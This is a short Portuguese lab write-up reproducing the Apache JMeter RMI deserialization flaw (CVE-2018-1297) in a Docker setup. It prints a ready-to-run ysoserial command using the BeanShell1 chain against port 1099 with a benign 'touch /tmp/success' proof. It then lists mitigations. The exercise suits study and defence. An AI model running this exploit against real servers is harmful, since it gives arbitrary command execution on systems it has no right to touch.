Vulnerabilidade de execução de comando de desserialização Jmeter RMI (CVE-2018-1297)
Apache JMeter é um conjunto de software open source escrito em Java pela American Apache Software Foundation para testes de estresse e desempenho.
As versões 2.x e 3.x têm uma vulnerabilidade de desserialização, e um atacante pode usar essa vulnerabilidade para executar comandos arbitrários no servidor alvo.
Execução do ambiente de vulnerabilidade :
Eu usei o docker no Kali Linux.
Quando a execução é concluída, o serviço RMI é iniciado e escuta na porta 1099.
Vulnerabilidade :
Realize o ataque de vulnerabilidade usando diretamente o ysoserial.
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success’
Insira o comando como acima.
Usei a cadeia de exploit BeanShell1.
docker compose exec jmeter bash
Usando isso para entrar no contêiner, você pode ver que '/tmp/success' foi criado com sucesso.

Resumo
Esta vulnerabilidade explora a vulnerabilidade RMI (Remote Method Invocation) que pode ocorrer em aplicações baseadas em Java.
O 'ysoserial-0.0.6-SNAPSHOT-all.jar' usado aqui faz parte do projeto ysoserial, e é usado para gerar payloads que exploram vulnerabilidades de desserialização Java para permitir execução remota de código.
Este payload tem o objetivo de executar comandos como /tmp/success, e através desta vulnerabilidade, um atacante pode executar comandos arbitrários no sistema remoto ou modificar arquivos do sistema.
Medidas para mitigar esta vulnerabilidade incluem restrição de acesso ao serviço RMI, controle rigoroso de permissões e filtragem de desserialização Java.